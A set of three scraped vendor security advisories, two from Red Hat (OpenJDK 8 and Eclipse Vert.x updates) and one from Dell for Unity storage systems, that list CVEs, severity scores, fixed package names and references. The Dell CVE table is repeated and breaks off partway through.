Red Hat Security Advisory 2022-2137-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-1.8.0-openjdk security update  
Advisory ID:       RHSA-2022:2137-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:2137  
Issue date:        2022-05-17  
CVE Names:         CVE-2022-21426 CVE-2022-21434 CVE-2022-21443   
                   CVE-2022-21476 CVE-2022-21496   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: Defective secure validation in Apache Santuario (Libraries,  
8278008) (CVE-2022-21476)

* OpenJDK: Unbounded memory allocation when compiling crafted XPath  
expressions (JAXP, 8270504) (CVE-2022-21426)

* OpenJDK: Improper object-to-string conversion in  
AnnotationInvocationHandler (Libraries, 8277672) (CVE-2022-21434)

* OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)  
(CVE-2022-21443)

* OpenJDK: URI parsing inconsistencies (JNDI, 8278972) (CVE-2022-21496)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2075788 - CVE-2022-21426 OpenJDK: Unbounded memory allocation when compiling crafted XPath expressions (JAXP, 8270504)  
2075793 - CVE-2022-21443 OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)  
2075836 - CVE-2022-21434 OpenJDK: Improper object-to-string conversion in AnnotationInvocationHandler (Libraries, 8277672)  
2075842 - CVE-2022-21476 OpenJDK: Defective secure validation in Apache Santuario (Libraries, 8278008)  
2075849 - CVE-2022-21496 OpenJDK: URI parsing inconsistencies (JNDI, 8278972)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
java-1.8.0-openjdk-1.8.0.332.b09-1.el9_0.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.332.b09-1.el9_0.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.332.b09-1.el9_0.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.332.b09-1.el9_0.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.332.b09-1.el9_0.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.332.b09-1.el9_0.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el9_0.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el9_0.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el9_0.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el9_0.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el9_0.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el9_0.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el9_0.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el9_0.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.332.b09-1.el9_0.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.332.b09-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.332.b09-1.el9_0.aarch64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.332.b09-1.el9_0.aarch64.rpm

ppc64le:  
java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.332.b09-1.el9_0.ppc64le.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.332.b09-1.el9_0.ppc64le.rpm

x86_64:  
java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.332.b09-1.el9_0.x86_64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.332.b09-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21426  
https://access.redhat.com/security/cve/CVE-2022-21434  
https://access.redhat.com/security/cve/CVE-2022-21443  
https://access.redhat.com/security/cve/CVE-2022-21476  
https://access.redhat.com/security/cve/CVE-2022-21496  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpn+ltzjgjWX9erEAQiJqBAAhLJxcSr28fL1Ob1ydp995JImoSLrd79m  
6pAP+1cmWkok9p7GORpLUaIadDftEk3juSm4poPAQ0eKE+dFzJWB+XHmOS0YvEab  
kc8v+LZqTrKpkLup3opMOtFQdW/y7gkaLccu9ww9bpjkwSGd8e5cMx0pp3TiY0vf  
VzLaB0xY6UrqaU5HrRTJYtKTO/ftzYlia+KQEg4JPMO00c6d8iPOj7a3KSRuYPtb  
gVqmrFTSPh4ES67hg03KEQcsn6/Sst0nM6ne0VhPYcU5hLCMowrOlqqHhm3qfbAm  
+XctTiYcMZpbcWdWeIoou4AaGJ76yoHGS74iCBBACD3EZnI4Rao5QbjFTlPPdSYb  
x070Gk+NoTjfg/Y2XMKJg/Fx6GZb8yShu9r6RBnqFA6em+r4sR09IHVGCM6HIuz0  
g+uOiVZJ0G+LKk3W2O0CgJlEX9eJOxBYtmp+PUfzwDvs6/9LwtRGGMZ1oCyijd4e  
jNmKBMEVk7GyVI279Mhe58t2EJyGbwXzLTR4myP/vjGWT2u5e3Nf09BRWux6e+Bv  
6JpraVXbqaMBylCHj5rVO1PbzBsDN0JgWTaCqh7C2QQs9fSvvnem28Z+7OWvneYq  
bN46Scujx6ueXc3UaLNj6wFO0bmp7LIr4S9wFFS0k0VO8ZdIhM1a01a4wcTjcbeE  
62Hnl63pgPY=  
=Mfpt  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-2137-01

Red Hat Security Advisory 2022-0737-01 - This release of Red Hat build of Eclipse Vert.x 4.2.5 GA includes security updates. For more information, see the release notes listed in the References section.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256=====================================================================                   Red Hat Security AdvisorySynopsis:          Moderate: Red Hat build of Eclipse Vert.x 4.2.5 security updateAdvisory ID:       RHSA-2022:0737-01Product:           Red Hat OpenShift Application RuntimesAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:0737Issue date:        2022-03-31CVE Names:         CVE-2021-38153 =====================================================================1. Summary:An update is now available for Red Hat build of Eclipse Vert.x.Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability. Formore information, see the CVE pages listed in the References section.2. Description:This release of Red Hat build of Eclipse Vert.x 4.2.5 GA includes securityupdates. For more information, see the release notes listed in theReferences section.Security Fix(es):* kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients(CVE-2021-38153)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgements, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:Before applying the update, back up your existing installation, includingall applications, configuration files, databases and database settings, andso on.The References section of this erratum contains a download link for theupdate. You must be logged in to download the update.4. Bugs fixed (https://bugzilla.redhat.com/):2009041 - CVE-2021-38153 Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients5. References:https://access.redhat.com/security/cve/CVE-2021-38153https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=catRhoar.eclipse.vertx&version=4.2.5https://access.redhat.com/documentation/en-us/red_hat_build_of_eclipse_vert.x/4.2/html/release_notes_for_eclipse_vert.x_4.2/index6. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2022 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBYpn+htzjgjWX9erEAQgSQQ/+IzltyAmn7JQchguOJ5hNdGLJ7tuKLkjeE1aBr+9T+HyQDciFSfIpZTBDR2nC8TG/BENI12TkrXGMaQT36JjPqonhhmXu+pEL5YJiX0GWIza4grI4RdRMKOwgmm1fbUYgrZmeOdF1ivawBQVzc1V97RLTFcKdfXLO6zUyO5KyNvugYeb9bKdPXKd9NtvBLmXjSqSkRvnIhf+mCwO4h30WPzinExV/cjlULi4awRUaia614lXM/srcPHh64RUCXgUc7QJH5tAbAMB3+80HgfHA2vgvTDEMvP4b1HkhSpN5qfZ4sRCzb/XJNpWFQpeEE0ECtDAUzaugNBOSa2EeWxzu7jLRu/43JDI982dyrkR3ZJtJDcFcroYlkeTsgrSi1S2/Ja+ccHsm3XaowhxyezjRYjQlf8tkzLazjw8l0vktB0Inj8TwHmHitI6ogynHulUILTDk1fUo6GHJed2MRec2wA7b5N6CUtXp1za7tVB9F25cnzdtMwJRf030IL9pjnH+xOWTpSsNFP+LeAi0YVbV2s7Pq55HQbqkSoL9WuFqSSsVDWgXWr3Q3NCUrdYmKRqsKfeWwuQmJ3xTsRR+hh8PH66Rgnp/mZQ7SFi1yjxp4H6gINPiK3uMGdQPtYWfn8xFovo9MHHrF4Y80RXg4rH7GVnEAMmMokMOcYipht8eZkA==RO6T-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-0737-01

Dell Unity, Dell UnityVSA, and Dell Unity XT versions prior to 5.2.0.0.5.173 contain a plain-text password storage vulnerability when certain off-array tools are run on the system. The credentials of a user with high privileges are stored in plain text. A local malicious user with high privileges may use the exposed password to gain access with the privileges of the compromised user.

Artikkelin numero: 000199050

**Yhteenveto: Dell Unity, Dell UnityVSA, and Dell Unity XT remediation is available for multiple security vulnerabilities that may be exploited by malicious users to compromise the affected system.**

*   Artikkelin sisältö
*   Juridiset tiedot
*   Artikkelin ominaisuudet
*   Arvostele tämä artikkeli

**Artikkelin sisältö**

**Vaikutus**

Critical

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-29084

Dell Unity, Dell UnityVSA, and Dell Unity XT versions before 5.2.0.0.5.173 do not restrict excessive authentication attempts in Unisphere GUI. A remote unauthenticated attacker may potentially exploit this vulnerability to brute-force passwords and gain access to the system as the victim. Account takeover is possible if weak passwords are used by users.

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-29085

Dell Unity, Dell UnityVSA, and Dell Unity XT versions before 5.2.0.0.5.173 contain a plain-text password storage vulnerability when certain off-array tools are run on the system. The credentials of a user with high privileges are stored in plain text. A local malicious user with high privileges may use the exposed password to gain access with the privileges of the compromised user.

6.4

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More Information**

aide

CVE-2021-45417

See NVD (http://nvd.nist.gov/) for individual scores for each CVE.  
 

apache2

CVE-2021-33193

CVE-2021-34798

CVE-2021-36160

CVE-2021-39275

CVE-2021-40438

CVE-2022-22719

CVE-2022-22720

CVE-2022-22721

CVE-2022-23943

Apache-tomcat

CVE-2021-25122

CVE-2021-25329

CVE-2021-30639

CVE-2021-30640

CVE-2021-33037

CVE-2021-41079

CVE-2021-42340

avahi

CVE-2021-3468

cyrus-sasl

CVE-2022-24407

Dell BSAFE™ Micro Edition Suite

CVE-2020-5359

See Dell KB DSA-2020-114: https://www.dell.com/support/kbdoc/en-us/000181098/dsa-2020-114-dell-bsafe-micro-edition-suite-multiple-security-vulnerabilities for individual scores for each CVE.

CVE-2020-5360

docker, containerd, runc

CVE-2021-30465

See NVD (http://nvd.nist.gov/) for individual scores for each CVE.

CVE-2021-32760

CVE-2021-41089

CVE-2021-41091

CVE-2021-41092

CVE-2021-41103

expat

CVE-2021-45960

CVE-2021-46143

CVE-2022-22822

CVE-2022-22823

CVE-2022-22824

CVE-2022-22825

CVE-2022-22826

CVE-2022-22827

CVE-2022-23852

CVE-2022-23990

CVE-2022-25235

CVE-2022-25236

CVE-2022-25313

CVE-2022-25314

CVE-2022-25315

glibc

CVE-2021-33574

CVE-2021-35942

json-c

CVE-2020-12762

kernel

CVE-2021-40490

libesmtp

CVE-2019-19977

net-snmp

CVE-2018-18065

CVE-2020-15862

openssl (Unisphere UI)

CVE-2022-0778

p11-kit

CVE-2020-29361

polkit

CVE-2021-4034

python3

CVE-2021-3426

CVE-2021-3733

CVE-2021-3737

sqlite3

CVE-2015-3414

CVE-2015-3415

CVE-2019-19244

CVE-2019-19317

CVE-2019-19603

CVE-2019-19645

CVE-2019-19646

CVE-2019-19880

CVE-2019-19923

CVE-2019-19924

CVE-2019-19925

CVE-2019-19926

CVE-2019-19959

CVE-2019-20218

CVE-2020-13434

CVE-2020-13435

CVE-2020-13630

CVE-2020-13631

CVE-2020-13632

CVE-2020-15358

CVE-2020-9327

tcpdump

CVE-2018-16301

tiff

CVE-2017-17095

CVE-2019-17546

CVE-2020-19131

CVE-2020-35521

CVE-2020-35522

CVE-2020-35523

CVE-2020-35524

CVE-2022-22844

ucode-intel

CVE-2020-24489

CVE-2020-24511

CVE-2020-24512

CVE-2020-24513

CVE-2021-0127

CVE-2021-0145

CVE-2021-0146

CVE-2021-33120

vim

CVE-2021-3778

CVE-2021-3796

CVE-2021-3872

CVE-2021-3927

CVE-2021-3928

CVE-2021-3984

CVE-2021-4019

CVE-2021-4193

CVE-2021-46059

CVE-2022-0319

CVE-2022-0351

CVE-2022-0361

CVE-2022-0413

xerces-s

CVE-2018-1311

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-29084

Dell Unity, Dell UnityVSA, and Dell Unity XT versions before 5.2.0.0.5.173 do not restrict excessive authentication attempts in Unisphere GUI. A remote unauthenticated attacker may potentially exploit this vulnerability to brute-force passwords and gain access to the system as the victim. Account takeover is possible if weak passwords are used by users.

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-29085

Dell Unity, Dell UnityVSA, and Dell Unity XT versions before 5.2.0.0.5.173 contain a plain-text password storage vulnerability when certain off-array tools are run on the system. The credentials of a user with high privileges are stored in plain text. A local malicious user with high privileges may use the exposed password to gain access with the privileges of the compromised user.

6.4

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More Information**

aide

CVE-2021-45417

See NVD (http://nvd.nist.gov/) for individual scores for each CVE.  
 

apache2

CVE-2021-33193

CVE-2021-34798

CVE-2021-36160

CVE-2021-39275

CVE-2021-40438

CVE-2022-22719

CVE-2022-22720

CVE-2022-22721

CVE-2022-23943

Apache-tomcat

CVE-2021-25122

CVE-2021-25329

CVE-2021-30639

CVE-2021-30640

CVE-2021-33037

CVE-2021-41079

CVE-2021-42340

avahi

CVE-2021-3468

cyrus-sasl

CVE-2022-24407

Dell BSAFE™ Micro Edition Suite

CVE-2020-5359

See Dell KB DSA-2020-114: https://www.dell.com/support/kbdoc/en-us/000181098/dsa-2020-114-dell-bsafe-micro-edition-suite-multiple-security-vulnerabilities for individual scores for each CVE.

CVE-2020-5360

docker, containerd, runc

CVE-2021-30465

See NVD (http://nvd.nist.gov/) for individual scores for each CVE.

CVE-2021-32760

CVE-2021-41089

CVE-2021-41091

CVE-2021-41092

CVE-2021-41103

expat

CVE-2021-45960

CVE-2021-46143

CVE-2022-22822

CVE-2022-22823

CVE-2022-22824

CVE-2022-22825

CVE-2022-22826

CVE-2022-22827

CVE-2022-23852

CVE-2022-23990

CVE-2022-25235

CVE-2022-25236

CVE-2022-25313

CVE-2022-25314

CVE-2022-25315

glibc

CVE-2021-33574

CVE-2021-35942

json-c

CVE-2020-12762

kernel

CVE-2021-40490

libesmtp

CVE-2019-19977

net-snmp

CVE-2018-18065

CVE-2020-15862

openssl (Unisphere UI)

CVE-2022-0778

p11-kit

CVE-2020-29361

polkit

CVE-2021-4034

python3

CVE-2021-3426

CVE-2021-3733

CVE-2021-3737

sqlite3

CVE-2015-3414

CVE-2015-3415

CVE-2019-19244

CVE-2019-19317

CVE-2019-19603

CVE-2019-19645

CVE-2019-19646

CVE-2019-19880

CVE-2019-19923

CVE-2019-19924

CVE-2019-19925

CVE-2019-19926

CVE-2019-19959

CVE-2019-20218

CVE-2020-13434

CVE-2020-13435

CVE-2020-13630

CVE-2020-13631

CVE-2020-13632

CVE-2020-15358

CVE-2020-9327

tcpdump

CVE-2018-16301

tiff

CVE-2017-17095

CVE-2019-17546

CVE-2020-19131

CVE-2020-35521

CVE-2020-35522

CVE-2020-35523

CVE-2020-35524

CVE-2022-22844

ucode-intel

CVE-2020-24489

CVE-2020-24511

CVE-2020-24512

CVE-2020-24513

CVE-2021-0127

CVE-2021-0145

CVE-2021-0146

CVE-2021-33120

vim

CVE-2021-3778

CVE-2021-3796

CVE-2021-3872

CVE-2021-3927

CVE-2021-3928

CVE-2021-3984

CVE-2021-4019

